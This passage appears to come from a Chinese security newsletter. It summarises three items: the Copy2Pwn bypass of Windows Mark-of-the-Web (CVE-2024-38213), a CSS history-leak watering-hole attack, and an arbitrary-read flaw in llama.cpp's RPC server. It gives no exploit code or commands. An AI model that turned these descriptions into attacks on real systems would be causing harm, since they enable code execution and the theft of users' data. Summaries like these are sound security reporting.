		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0a
			 Copy2Pwn漏洞绕过Windows网络保护</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Zero Day Initiative 的威胁研究员发现了 CVE-2024-38213，一种简单有效的方法，可以绕过 Windows 的网络标记保护（Mark-of-the-Web, MotW），导致远程代码执行。这种新型攻击手段被称为 copy2pwn，它利用了 WebDAV 分享文件在复制到本地时没有应用 MotW 的漏洞。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.22407407407407406" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a00417cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgibEIInicTvwJ8Dgv3z2urcQ0yky8ayYuNn9AtRDKVeENpia2CT8sutzNw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.2796296296296296" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=4e6ccff5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgcr65Gp9ic7iaOcALBAXJibWf9j3gccaJaXMrPLCricmcInYbx0zR0rr5vQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.22777777777777777" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=995f8ab8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgBSQ084GsJTtEBsaT2DHbAiawmMJsVY1E392wzr2OydQBicYX7fJwW28A%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-38213 漏洞利用绕过 Windows 网络保护</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软修复高危漏洞CVE-2024-38213，已被攻击者利用</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg4qKFVJxEzyJs34sycEd8mLzdpbPTN3Z4N8dYFicoTu5KiaEZrrsgYEFA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg4qKFVJxEzyJs34sycEd8mLzdpbPTN3Z4N8dYFicoTu5KiaEZrrsgYEFA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855184125888552"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WebDAV 分享文件的复制粘贴操作可能会绕过网络标记保护，导致远程代码执行的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">网络标记保护对于防止未知来源的文件执行至关重要，它是 Windows Defender SmartScreen 和 Microsoft Office 受保护视图等安全功能的基础。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">威胁行为者利用 WebDAV 分享和精心设计的搜索查询来诱导用户执行恶意代码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows 操作系统在处理来自 WebDAV 分享的文件时存在多个绕过网络标记保护的漏洞，这些漏洞已被微软修复。</section></li></ul>
	<br/>
	<p>🏷️: CVE-2024-38213, Copy2Pwn, Windows, WebDAV, 远程代码执行</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0b
			 结合历史泄露与CSS的水坑攻击</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文探讨了结合历史泄露和CSS的水坑攻击方法，即使这些技术已经很老，但仍然有效。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.44785276073619634" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="326" src="https://wechat2rss.xlab.app/img-proxy/?k=ac6cbb0b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgvQnxW7IIq6NNy845FoNoTZQhuiaUryuUYhEZ1rsoU4s7AcIRqnerYiaA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.44785276073619634" data-w="326" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=0aeb8d21&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg1ZzcrB4MxiaW6LlibuDzfV4dic1vwm0ia3z90FYyKdAfQE15peF5oricY0Q%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.7683923705722071" data-w="734" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=405c783a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgewr7y83ttKSwDkNFIw7qfWqbkHdbWJnybvpsgFibCBiatA51Usib6NxHQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用CSS历史记录泄露结合水坑攻击</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用CSS结合水坑攻击，窃取历史数据</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTglB4D5bXHxia3SU1eJ9574M4mAd7OTf1Rzrj9HLaCKejJdRiaRQuvvicLQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTglB4D5bXHxia3SU1eJ9574M4mAd7OTf1Rzrj9HLaCKejJdRiaRQuvvicLQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122814852142144"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">客户端攻击技术虽然老旧，但仍然有效：文章指出，尽管所讲述的技术已经存在多年，但它们在现代安全环境中仍然具有攻击价值。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">字符集对XSS攻击的影响：通过讨论编码差异，文章强调了缺失字符集属性如何导致XSS漏洞，并提到了历史上的一些相关案例。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">历史泄露作为精准攻击的手段：通过检测用户访问过的网站，攻击者可以更精确地识别和攻击高价值目标。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CSS样式的运用：文章展示了如何利用CSS样式来实现对用户历史记录的检测，并通过实例代码演示了这一过程。</section></li></ul>
	<br/>
	<p>🏷️: 水坑攻击, 历史泄露, CSS, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0c
			 GitHub项目ggerganov/llama.cpp中的rpc_server::get_tensor功能存在任意地址读取漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">GitHub 上 ggerganov/llama.cpp 项目的 rpc_server::get_tensor 功能存在任意地址读取漏洞，可能导致信息泄露，并且已被证实可以与另一个任意地址写入漏洞结合实现远程代码执行（RCE）。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.525" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5e1d1b54&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgxBcE9abqhlxfURSxG2rveZrZiaBVlsaQ3OOPbkmF9VqGwEF07xC58Bw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
